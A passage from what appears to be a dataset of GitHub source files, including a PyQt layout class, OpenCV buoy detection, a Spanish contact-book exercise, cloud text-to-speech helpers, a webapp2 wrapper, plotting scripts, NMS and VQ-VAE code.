QtCore.Qt.Orientations(QtCore.Qt.Orientation(0))\n\n def hasHeightForWidth(self):\n return True\n\n def heightForWidth(self, width):\n height = self.doLayout(QtCore.QRect(0, 0, width, 0), True)\n \n return height\n\n def setGeometry(self, rect):\n super(VertexFlowLayout, self).setGeometry(rect)\n self.doLayout(rect, False)\n\n def sizeHint(self):\n return self.minimumSize()\n\n def minimumSize(self):\n size = QtCore.QSize()\n\n for item in self.itemList:\n size = size.expandedTo(item.minimumSize())\n\n size += QtCore.QSize(2 * self.margin, 2 * self.margin)\n return size\n \n def addAddWidget(self, addWidget):\n \n if(self.addLastWidget != None):\n self.removeAddWidget()\n self.addLastWidget = addWidget\n self.addWidget(self.addLastWidget)\n \n def removeAddWidget(self):\n \n if(self.addLastWidget):\n self.addLastWidget.deleteLater()\n self.addLastWidget = None\n \n self.update()\n\n def doLayout(self, rect, testOnly):\n x = rect.x()\n y = rect.y()\n lineHeight = 0\n \n \n if(len(self.itemList) > 0):\n self.maxcards = rect.right() / (self.itemList[0].sizeHint().width() + self.spaceX)\n if(self.maxcards<1):\n return\n self.maxcardsint = floor(self.maxcards)\n self.sizepercard = rect.right() / self.maxcardsint\n self.cardheight = self.itemList[0].sizeHint().height() + self.spaceY\n self.cardcount = len(self.itemList) // self.maxcardsint\n self.height = ((self.cardcount + 1) * self.cardheight + self.spaceY)\n\n else: \n return 0\n \n count = 0\n for item in self.itemList:\n print(item)\n column = 0\n rowcount = 0\n if(count != 0): \n column = count // self.maxcardsint\n rowcount = count % self.maxcardsint \n \n\n rowcount = rowcount * self.sizepercard + self.spaceX \n column = column * (self.spaceY + item.sizeHint().height()) + self.spaceY\n item.setGeometry(QtCore.QRect(QtCore.QPoint(rowcount, column), item.sizeHint()))\n count += 1 \n\n \n return self.height\n \n ","repo_name":"5k1n2/Porta","sub_path":"view/VertexFlowLayout.py","file_name":"VertexFlowLayout.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31258438329","text":"import cv2\nimport numpy as np\n\ndef draw_text(img, text,\n font=cv2.FONT_HERSHEY_SIMPLEX,\n pos=(0, 0),\n font_scale=1,\n font_thickness=2,\n text_color=(0, 255, 0),\n text_color_bg=(0, 0, 0)\n ):\n\n x, y = pos\n text_size, _ = cv2.getTextSize(text, font, font_scale, font_thickness)\n text_w, text_h = text_size\n cv2.rectangle(img, pos, (x + text_w, y + text_h), text_color_bg, -1)\n cv2.putText(img, text, (x, y + text_h + font_scale - 1), font, font_scale, text_color, font_thickness)\n\n return text_size\n\n\nimage = 127 * np.ones((100, 200, 3), dtype=\"uint8\")\npos = (10, 10)\nw, h = draw_text(image, \"leander\", pos=(10, 10))\ndraw_text(image, \"gwapo\", font_scale=1, pos=(10, 20 + h), text_color_bg=(255, 0, 0))\ncv2.imshow(\"image\", image)\ncv2.waitKey()","repo_name":"leander0909/Thesis","sub_path":"Yolov5_DeepSort_Pytorch/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26716540075","text":"\"\"\"\nEjercicio 5\nRealizar una clase que administre una agenda. Se debe almacenar para cada contacto\nel nombre, el teléfono y el email. Además deberá mostrar un menú con las siguientes\nopciones: \n-Añadir contacto\n-Lista de contactos\n-Buscar contacto\n-Editar contacto\n-Cerrar agenda\n\"\"\"\n\n# clases\nclass Agenda:\n def __init__(self):\n self.contactos = {\n 'Federico':{'Numero':665455565,'Mail':'fede@gmail.com'},\n 'Juan':{'Numero':654789988,'Mail':'juan@gmail.com'},\n 'Lucas':{'Numero':665123456,'Mail':'lucas@gmail.com'}\n }\n\n def listar(self):\n for contacto in self.contactos:\n print(f'''\nNombre: {contacto} \nNumero: {self.contactos[contacto]['Numero']}\nMail: {self.contactos[contacto]['Mail']}''')\n input(\"\\nPresione enter para volver al menu.\")\n\n def buscar(self):\n busqueda = input(\"\\nEscriba el nombre a buscar: \").capitalize()\n if busqueda in self.contactos:\n print(f'''\nNombre: {busqueda} \nNumero: {self.contactos[busqueda]['Numero']}\nMail: {self.contactos[busqueda]['Mail']}\n ''')\n input(\"\\nPresione enter para volver al menu.\")\n else:\n print(\"\\nNo se encuentra el contacto\\n\")\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.buscar()\n\n \n def crear(self):\n nombre = input(\"\\nEscriba el nombre del contacto: \").capitalize()\n if nombre in self.contactos:\n print(\"Se encontro el siguiente contacto con ese nombre\\n\")\n print(f'''\nNombre: {nombre} \nNumero: {self.contactos[nombre]['Numero']}\nMail: {self.contactos[nombre]['Mail']}\n ''')\n op = input(\n f\"Esta seguro que quieres sobrescribir el contacto?\\n[1] - Si\\n[2] - No\\n\"\n )\n if op == \"1\":\n while True:\n print(f\"Nombre del contacto: {nombre}\")\n telefono = input(\"Escriba el numero de telefono: \")\n try:\n telefono = int(telefono)\n break\n except:\n print('\\nDebes ingresar solo numeros\\n')\n mail = input(\"Escriba el mail: \")\n self.contactos[nombre] = {'Numero':telefono,'Mail':mail}\n print(f\"\\nSe agrego el contacto '{nombre}' en la agenda.\\n\")\n else:\n self.crear()\n else:\n while True:\n telefono = input(\"Escriba el numero de telefono: \")\n try:\n telefono = int(telefono)\n break\n except:\n print('\\nDebes ingresar solo numeros\\n')\n mail = input(\"Escriba el mail: \")\n self.contactos[nombre] = {'Numero':telefono,'Mail':mail}\n print(f\"\\nSe agrego el contacto '{nombre}' en la agenda.\\n\")\n\n def editar(self):\n nombre = input(\"\\nEscriba el nombre del contacto a editar: \").capitalize()\n if nombre in self.contactos:\n print(\"Se encontro el siguiente contacto con ese nombre\\n\")\n print(f'''\nNombre: {nombre}\nNumero: {self.contactos[nombre]['Numero']}\nMail: {self.contactos[nombre]['Mail']}\n ''')\n op = input(\n f\"Esta seguro que quieres editar el contacto?\\n[1] - Si\\n[2] - No\\n\"\n )\n if op == \"1\":\n while True:\n print(f\"Nombre del contacto: {nombre}\")\n telefono = input(\"Escriba el numero de telefono: \")\n try:\n telefono = int(telefono)\n break\n except:\n print(f'Debes ingresar solo numeros')\n mail = input(\"Escriba el mail: \")\n print(f\"\\nNombre del contacto: {nombre}\")\n print(f\"Telefono del contacto: {telefono}\")\n print(f\"Mail del contacto: {mail}\\n\")\n self.contactos[nombre] = {'Numero':telefono,'Mail':mail}\n print(f\"\\nSe modifico el contacto '{nombre}' en la agenda.\\n\")\n else:\n self.editar()\n else:\n print(\"\\nNo se encuentra el contacto\\n\")\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.editar()\n\n def borrar(self):\n busqueda = input(\"\\nEscriba el nombre a buscar: \").capitalize()\n if busqueda in self.contactos:\n op = input(f'''\nEsta seguro que desea borrar el siguiente contacto?\n\nNombre: {busqueda} \nNumero: {self.contactos[busqueda]['Numero']}\nMail: {self.contactos[busqueda]['Mail']}\n\n[1] - Si\n[2] - No\n\n''' )\n if op == \"1\":\n del self.contactos[busqueda]\n print(f\"\\nEl contacto '{busqueda}' se borro correctamente.\\n\")\n else:\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.borrar()\n else:\n print(\"\\nNo se encuentra el contacto\\n\")\n op = input(\"Quieres buscar nuevamente?\\n[1] - Si\\n[2] - No\\n\")\n if op == \"1\":\n self.borrar()\n \n\n# funciones\ndef menu():\n print(\"\\n- M E N U -\")\n print(\"[1] - Ver agenda\")\n print(\"[2] - Buscar contacto\")\n print(\"[3] - Agregar contacto\")\n print(\"[4] - Editar contacto\")\n print(\"[5] - Borrar contacto\")\n print(\"[6] - Salir\\n\")\n\n opcion = input(\"Elija una opcion: \")\n validar_opcion(opcion)\n\n\ndef validar_opcion(opcion):\n if opcion == \"1\":\n agenda.listar()\n elif opcion == \"2\":\n agenda.buscar()\n elif opcion == \"3\":\n agenda.crear()\n elif opcion == \"4\":\n agenda.editar()\n elif opcion == \"5\":\n agenda.borrar()\n elif opcion == \"6\":\n print(\"\\nAdios!\")\n exit()\n else:\n print(\"\\nOpcion incorrecta, intente nuevamente\\n\")\n menu()\n\n\n\n# programa\nprint(\" - - - A G E N D A - - - \")\nagenda = Agenda()\nwhile True:\n menu()\n\n","repo_name":"Lartweib/Bootcamp-Python-MachineLearning","sub_path":"Python/Ejercicios/POO/Ejercicio 5 -clase agenda.py","file_name":"Ejercicio 5 -clase agenda.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"16911124268","text":"import uuid\n\nimport boto3\nfrom google.cloud import texttospeech\nfrom talko_lingo.utils.config import get_pipeline_config\nfrom talko_lingo.utils.job_id import extract_input_output_lang_from_job_id\n\n\nclass AwsTextToSpeech(object):\n def run(self, text, output_bucket, job_id):\n _, output_lang = extract_input_output_lang_from_job_id(job_id)\n voices = {\n 'fr-CA': 'Chantal',\n 'en-AU': 'Nicole',\n 'en-US': 'Joanna',\n 'en-GB': 'Emma',\n 'es-US': 'Penelope',\n }\n\n polly_client = boto3.client('polly')\n polly_client.start_speech_synthesis_task(\n OutputFormat='mp3',\n OutputS3BucketName=output_bucket.name,\n OutputS3KeyPrefix='output/{}/'.format(job_id),\n Text=text,\n VoiceId=voices[output_lang],\n LanguageCode=output_lang\n )\n\n\nclass GcpTextToSpeech(object):\n def run(self, text, output_bucket, job_id):\n _, output_lang = extract_input_output_lang_from_job_id(job_id)\n client = texttospeech.TextToSpeechClient()\n synthesis_input = texttospeech.types.SynthesisInput(text=text)\n\n voice = texttospeech.types.VoiceSelectionParams(\n language_code=output_lang,\n ssml_gender=texttospeech.enums.SsmlVoiceGender.FEMALE,\n )\n\n audio_config = texttospeech.types.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3,\n )\n\n response = client.synthesize_speech(synthesis_input, voice, audio_config)\n\n s3 = boto3.resource('s3')\n key = 'output/{}/{}.mp3'.format(job_id, str(uuid.uuid4()))\n s3object = s3.Object(output_bucket.name, key)\n s3object.put(Body=response.audio_content)\n\n\ndef text_to_speech(text, output_bucket, job_id):\n pipeline_config = get_pipeline_config()\n text_to_speech_mode = pipeline_config.get('TextToSpeechMode', 'aws')\n text_to_speech_class = AwsTextToSpeech if text_to_speech_mode == 'aws' else GcpTextToSpeech\n text_to_speech_class().run(text=text, output_bucket=output_bucket, job_id=job_id)\n","repo_name":"deborabr21/talko-lingo","sub_path":"src/cloud/s3_event_handlers/talko_lingo/utils/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4638418790","text":"from audi.http.response import JSONResponse\n\nimport os\nimport sys\nimport json\nimport importlib\nimport webapp2\n\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), 'external'))\n\n\nclass Audi(webapp2.WSGIApplication):\n def __init__(self, debug=True, conf=None):\n super(Audi, self).__init__(debug=debug, config=self._update_conf(conf))\n self._initialize()\n\n def _update_conf(self, cust_conf):\n from settings import config as audi_config\n for name, value in cust_conf.iteritems():\n if name == 'template_path':\n audi_config['webapp2_extras.jinja2']['template_path'] += value\n else:\n audi_config[name] = value\n return audi_config\n\n def _initialize(self):\n self.router.set_dispatcher(self.__class__.dispatcher)\n\n self._load_app_routes()\n\n self._load_authenticator()\n\n self._load_default_err_handlers()\n\n def _load_app_routes(self):\n for app_mod_name in self.config['installed_apps']:\n app_routes = importlib.import_module('%s.routes' % app_mod_name)\n for r in app_routes.routes:\n self.router.add(r)\n\n def _load_authenticator(self):\n auth_cfg = self.config.get('auth')\n if not auth_cfg:\n return None\n\n auth_mod = auth_cfg.get('class', None)\n auth_args = auth_cfg.get('args', {})\n if auth_mod:\n split_names = auth_mod.split('.')\n mod_name = '.'.join(split_names[0:-1])\n cls_name = split_names[-1]\n auth_cls = getattr(importlib.import_module(mod_name), cls_name)\n self.authenticator = auth_cls(auth_args.values(), **auth_args)\n\n def _load_default_err_handlers(self):\n if not self.debug:\n from .contrib.error_handler import handle_error\n for status_code in self.config['error_templates']:\n self.error_handlers[status_code] = handle_error\n\n @staticmethod\n def dispatcher(router, request, response):\n request.json = {}\n if request.headers.get('Content-Type') == 'application/json':\n request.json = json.loads(request.body)\n\n rv = router.default_dispatcher(request, response)\n if isinstance(rv, basestring):\n rv = webapp2.Response(rv)\n elif isinstance(rv, tuple):\n rv = webapp2.Response(*rv)\n elif isinstance(rv, dict) or isinstance(rv, list):\n rv = JSONResponse(rv)\n\n for r in [rv, response]:\n if r:\n r.headers['Access-Control-Allow-Origin'] = '*'\n\n return rv\n\n @classmethod\n def create_app(cls, conf):\n assert conf is not None\n\n env_sw = 'SERVER_SOFTWARE'\n is_debug = env_sw not in os.environ or os.environ[env_sw].startswith('Dev')\n return cls(debug=is_debug, conf=conf)\n","repo_name":"sangwonl/audi","sub_path":"audi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42121137027","text":"\"\"\"\nGiven an array of integers, sort the array in ascending order using the Bubble Sort algorithm above.\nOnce sorted, print the following three lines:\n\nArray is sorted in numSwaps swaps.,numSwap where is the number of swaps that took place.\nFirst Element: firstElement, where firstElement is the first element in the sorted array.\nLast Element: lastElement, where lastElement is the last element in the sorted array.\n\"\"\"\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countSwaps function below.\ndef countSwaps(a):\n l = len(a)\n numSwap = 0\n for i in range(l):\n for j in range(l-i-1):\n if a[j] > a[j+1]:\n a[j],a[j+1] = a[j+1],a[j]\n numSwap += 1\n print('Array is sorted in %d swaps.' % numSwap)\n print('First Element: %d' % a[0])\n print('Last Element: %d' % a[-1])\n\nif __name__ == '__main__':\n n = int(input())\n a = list(map(int, input().rstrip().split()))\n countSwaps(a)\n","repo_name":"irfa89/HackerRank-InterviewPreparation","sub_path":"bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34298837614","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom dateutil import parser as dateparser\n\ndf = pd.read_csv('speedtests.csv')\ndf.to_numpy()\n\ndownloads = df['Download'].to_numpy()\ndownloads_in_mbits = downloads/1000000\ndownloads_in_mbits_round = downloads_in_mbits.round(2)\nmean_download_mbits = downloads_in_mbits.mean().round(2)\nmedian_downloads = np.median(downloads_in_mbits_round)\nmid_down = np.max(downloads_in_mbits_round) - np.min(downloads_in_mbits_round) \nmid_down = mid_down/2 + np.min(downloads_in_mbits_round) \n\nprint(\"Mean Download \" + str(mean_download_mbits) + \" MBit/s\")\n\nuploads = df['Upload'].to_numpy()\nuploads_in_mbits = uploads/1000000\nuploads_in_mbits_round = uploads_in_mbits.round(2)\nmean_upload_mbits = uploads_in_mbits.mean().round(2)\nmedian_uploads = np.median(uploads_in_mbits_round)\nmid_up = np.max(uploads_in_mbits_round) - np.min(uploads_in_mbits_round) \nmid_up = mid_up/2 + np.min(uploads_in_mbits_round) \n\nprint(\"Mean Upload \" + str(mean_upload_mbits) + \" MBit/s\")\n\ntimestamps = df['Timestamp'].to_numpy()\ntimestamps = [dateparser.parse(time) for time in timestamps]\n\n########################################################################\n### Some plots\n\nfig = plt.figure()\nax = fig.add_subplot()\n\nax.set_title(\"Download Speed\")\nax.plot(timestamps, downloads_in_mbits_round, label=\"Download Speed\")\nax.set_xlabel(\"Time\")\nax.set_ylabel(\"MBit/s\")\nax.grid(True)\nax.fill_between(timestamps, 26, 34, alpha=0.1)\nax.fill_between(timestamps, downloads_in_mbits_round - 1, downloads_in_mbits_round + 1, alpha=0.3)\nax.legend()\nplt.show()\n\nfig = plt.figure()\nax = fig.add_subplot()\nax.set_title(\"Up- and Download Speed\")\nax.plot(timestamps, downloads_in_mbits_round, label=\"Download Speed\")\nax.plot(timestamps, uploads_in_mbits_round, label=\"Upload Speed\")\nax.set_xlabel(\"Time\")\nax.set_ylabel(\"MBit/s\")\nax.grid(True)\nax.fill_between(timestamps, 26, 34, alpha=0.1)\nax.fill_between(timestamps, 2, 7, alpha=0.1)\nax.fill_between(timestamps, downloads_in_mbits_round - 1, downloads_in_mbits_round + 1, alpha=0.3)\nax.fill_between(timestamps, uploads_in_mbits_round - 1, uploads_in_mbits_round + 1, alpha=0.3)\nax.legend()\nplt.show()\n\n### Box \n\nfig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, figsize=(9, 4))\nbplot1 = ax1.boxplot(downloads_in_mbits_round,\n vert=True, # vertical box alignment\n patch_artist=True, # fill with color\n ) # will be used to label x-ticks\nax1.set_title('Download')\nax1.text(0.7,mid_down, \"Mean: \" + str(mean_download_mbits) \n + \"\\nMin: \" + str(np.min(downloads_in_mbits_round))\n + \"\\nMax: \" + str(np.max(downloads_in_mbits_round))\n + \"\\nMedian:\" + str(median_downloads),\n style='italic',\n bbox={'facecolor': 'red', 'alpha': 0.2, 'pad': 10}\n )\n\nbplot3 = ax3.boxplot(uploads_in_mbits_round,\n vert=True, # vertical box alignment\n patch_artist=True, # fill with color\n ) # will be used to label x-ticks\nax3.set_title('Upload')\nax3.text(0.7,mid_up, \"Mean: \" + str(mean_upload_mbits) \n + \"\\nMin: \" + str(np.min(uploads_in_mbits_round))\n + \"\\nMax: \" + str(np.max(uploads_in_mbits_round))\n + \"\\nMedian:\" + str(median_uploads),\n style='italic',\n bbox={'facecolor': 'red', 'alpha': 0.2, 'pad': 10}\n )\n\nbplot2 = ax2.boxplot(downloads_in_mbits_round,\n notch=True, # notch shape\n vert=True, # vertical box alignment\n patch_artist=True, # fill with color\n ) # will be used to label x-ticks\nax2.set_title('Download (notched)')\nbplot4 = ax4.boxplot(uploads_in_mbits_round,\n notch=True, # notch shape\n vert=True, # vertical box alignment\n patch_artist=True, # fill with color\n ) # will be used to label x-ticks\nax4.set_title('Upload (notched')\n\nplt.show()","repo_name":"hitbear/speedpi","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44165927080","text":"# -*- coding:utf-8 -*-\n\nimport numpy as np\n\ndef py_cpu_nms(bboxes, thresh):\n\n x1 = bboxes[:, 0]\n y1 = bboxes[:, 1]\n x2 = bboxes[:, 2]\n y2 = bboxes[:, 3]\n scores = bboxes[:, 4]\n\n areas = (x2 - x1 + 1) * (y2 - y1 + 1)\n order = scores.argsort()[::-1]\n\n keep = []\n while order.size > 0:\n i = order[0]\n keep.append(i)\n xx1 = np.maximum(x1[i], x1[order[1:]])\n yy1 = np.maximum(y1[i], y1[order[1:]])\n xx2 = np.minimum(x2[i], x2[order[1:]])\n yy2 = np.minimum(y2[i], y2[order[1:]])\n\n w = np.maximum(0.0, xx2 - xx1 + 1)\n h = np.maximum(0.0, yy2 - yy1 + 1)\n intersection = w * h\n\n iou = intersection / (areas[i] + areas[order[1:]] - intersection)\n\n index = np.where(iou <= thresh)[0]\n order = order(index + 1)\n\n return keep\n\n\n\n","repo_name":"Michael3444/MTCNN-tf-reproduce","sub_path":"tools/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4013109552","text":"import cv2\nimport numpy as np\nimport sys\nimport os\nimport time\n\n\n# Add the parent folder path to the system's import path\nsys.path.append(os.path.abspath('../IP_general'))\n\nfrom utils2 import masking,bounding_box, between_buoys, camera2lidar\nimport math\n\n### fps icin ###\nprev_image_time = 0\nnew_image_time = 0\na = 0\n################\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\nlower_red = np.array([0,59,21])\nupper_red = np.array([26,255,255])\n\n\nlower_green = np.array([53,87,59])\nupper_green = np.array([130,255,255])\n\n\nlower_yellow = np.array([14, 0, 0])\nupper_yellow = np.array([36,255,119])\n\nlower_black = np.array([0, 0, 0])\nupper_black = np.array([0,0,7])\n\ncap = cv2.VideoCapture(0)\nif not cap.isOpened():\n print(\"camera failed\")\n\nret,image = cap.read()\nwidth = image.shape[1]\nheigth = image.shape[0]\n\nprint(width, heigth)\n\nwhile True:\n ret,image = cap.read()\n if not ret:\n break\n \n image = cv2.resize(image, (0, 0), fx = 0.5, fy = 0.5)\n\n hsv_frame = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n print(\"######### red ########\")\n mask_red = masking(hsv_frame, lower_red, upper_red, opening_kernel = 0, medianF_tresh = 0)\n reds = bounding_box(mask_red,100,\"red\")\n print(reds)\n\n print(\"******* green *********\")\n mask_green = masking(hsv_frame, lower_green, upper_green, opening_kernel = 0, medianF_tresh = 0)\n greens= bounding_box(mask_green,100,\"green\")\n print(greens)\n\n\n print(\"^^^^^^ yellow ^^^^^^^\")\n mask_yellow= masking(hsv_frame, lower_yellow, upper_yellow, opening_kernel = 0, medianF_tresh = 0)\n yellows= bounding_box(mask_yellow,100,\"yellow\")\n print(yellows)\n\n print(\":::::::: black ::::::\")\n mask_black = masking(hsv_frame, lower_black, upper_black, opening_kernel = 0, medianF_tresh = 0)\n blacks= bounding_box(mask_black,100,\"black\")\n print(blacks)\n\n\n \n middle = between_buoys(greens,reds) #closest middle point\n\n ##for visualising##\n try:\n if middle[1] == True:\n \n cv2.circle(image, middle[0], int(middle[2]*0.1), (255,255,255), 2)\n else:\n cv2.circle(image, middle[0], int(middle[2]*0.1), (0,0,0), 2)\n\n for i in greens:\n radius = int( math.sqrt(i[1] / math.pi))\n cv2.circle(image, i[0], radius, (0,255,0), 2)\n cv2.putText(image, \"green\", (i[0][0], i[0][1] - 15), font, 0.7, (0,255,0), 2)\n \n for j in reds:\n \n radius = int( math.sqrt(j[1] / math.pi))\n cv2.circle(image, j[0], radius, (0,0,255), 2)\n cv2.putText(image, \"red\", (j[0][0], j[0][1] - 15), font, 0.7, (0,0,255), 2)\n \n for k in yellows:\n \n radius = int( math.sqrt(k[1] / math.pi))\n cv2.circle(image, k[0], radius, (0,255,255), 2)\n cv2.putText(image, \"yellow\", (k[0][0], k[0][1] - 15), font, 0.7, (0,255,255), 2)\n \n for z in blacks:\n \n radius = int( math.sqrt(z[1] / math.pi))\n cv2.circle(image, z[0], radius, (0,255,255), 2)\n cv2.putText(image, \"black\", (z[0][0], z[0][1] - 15), font, 0.7, (0,255,255), 2)\n \n \n except:\n pass\n\n \n\n shift = int((270-60)/2)\n ratio = 60/width \n\n\n colors = [] \n\n if reds != None:\n colors += reds\n if yellows != None:\n colors += yellows\n if greens != None:\n colors += greens\n if blacks != None:\n colors += blacks\n\n\n\n print(\"*************************\")\n testr = camera2lidar(width,60,colors)\n print(testr)\n try:\n testr = camera2lidar(width,60,colors)\n print(testr)\n for i,o in enumerate(testr):\n if o != 0:\n if o == \"red\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 0, 255), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n if o == \"green\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 255, 0), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n if o == \"yellow\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 255, 255), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n if o == \"black\":\n ind = i - shift\n cv2.line(image, (int(ind//ratio),0 ), (int(ind//ratio), heigth), (0, 0, 0), 1)\n cv2.line(image, (int((ind+1)//ratio),0 ),(int((ind+1)//ratio), heigth), (0, 0, 255), 1)\n \n except:\n pass\n\n\n\n\n\n\n ### fps icin ##\n new_image_time = time.time()\n fps = 1 / (new_image_time - prev_image_time)\n prev_image_time = new_image_time\n fps = int(fps)\n fps = str(fps)\n cv2.putText(image, \"fps: \" + fps, (width - 100, 25), font, 0.7, (0, 255, 255), 1, cv2.LINE_AA)\n ##########\n\n cv2.imshow(\"Image\", image)\n cv2.imshow(\"b\", mask_black)\n cv2.imshow(\"r\", mask_red)\n cv2.imshow(\"g\", mask_green)\n cv2.imshow(\"y\", mask_yellow)\n\n k = cv2.waitKey(1) \n if k == ord('q'): \n break\n \n ########\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"AutobeeSoftware/IP_general","sub_path":"NJORD/finding_middle_video.py","file_name":"finding_middle_video.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71042026662","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nimport gml_harm.model.vqvae2.distributed_helper as dist_fn\n\n\n# Copyright 2018 The Sonnet Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\n\n# Borrowed from https://github.com/deepmind/sonnet and ported it to PyTorch\n\n\nclass Quantize(nn.Module):\n def __init__(self, dim, n_embed, decay=0.99, eps=1e-5):\n super().__init__()\n\n self.dim = dim\n self.n_embed = n_embed\n self.decay = decay\n self.eps = eps\n\n embed = torch.randn(dim, n_embed)\n self.register_buffer(\"embed\", embed)\n self.register_buffer(\"cluster_size\", torch.zeros(n_embed))\n self.register_buffer(\"embed_avg\", embed.clone())\n\n def forward(self, input):\n flatten = input.reshape(-1, self.dim)\n dist = (\n flatten.pow(2).sum(1, keepdim=True)\n - 2 * flatten @ self.embed\n + self.embed.pow(2).sum(0, keepdim=True)\n )\n _, embed_ind = (-dist).max(1)\n embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)\n embed_ind = embed_ind.view(*input.shape[:-1])\n quantize = self.embed_code(embed_ind)\n\n if self.training:\n embed_onehot_sum = embed_onehot.sum(0)\n embed_sum = flatten.transpose(0, 1) @ embed_onehot\n\n dist_fn.all_reduce(embed_onehot_sum)\n dist_fn.all_reduce(embed_sum)\n\n self.cluster_size.data.mul_(self.decay).add_(\n embed_onehot_sum, alpha=1 - self.decay\n )\n self.embed_avg.data.mul_(self.decay).add_(embed_sum, alpha=1 - self.decay)\n n = self.cluster_size.sum()\n cluster_size = (\n (self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n\n )\n embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)\n self.embed.data.copy_(embed_normalized)\n\n diff = F.mse_loss(input, quantize.detach(), reduction='mean')\n quantize = input + (quantize - input).detach()\n return quantize, diff, embed_ind\n\n def embed_code(self, embed_id):\n return F.embedding(embed_id, self.embed.transpose(0, 1))\n\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channel, channel):\n super().__init__()\n\n self.conv = nn.Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channel, channel, 3, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, in_channel, 1, bias=True),\n # nn.BatchNorm2d(in_channel),\n )\n\n def forward(self, input):\n out = self.conv(input)\n out += input\n\n return out\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_channel, channel, n_res_block, n_res_channel, stride):\n super().__init__()\n\n if stride == 4:\n blocks = [\n nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // 2, channel, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel, channel, 3, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n ]\n\n elif stride == 2:\n blocks = [\n nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // 2, channel, 3, padding=1, bias=True),\n # nn.BatchNorm2d(channel),\n ]\n\n for i in range(n_res_block):\n blocks.append(ResBlock(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, input):\n return self.blocks(input)\n\n\nclass Decoder(nn.Module):\n def __init__(\n self, in_channel, out_channel, channel, n_res_block, n_res_channel, stride\n ):\n super().__init__()\n\n blocks = [nn.Conv2d(in_channel, channel, 3, padding=1)]\n\n for i in range(n_res_block):\n blocks.append(ResBlock(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n if stride == 4:\n blocks.extend(\n [\n nn.ConvTranspose2d(channel, channel // 2, 4, stride=2, padding=1, bias=True),\n # nn.BatchNorm2d(channel // 2),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(\n channel // 2, out_channel, 4, stride=2, padding=1\n ),\n ]\n )\n\n elif stride == 2:\n blocks.append(\n 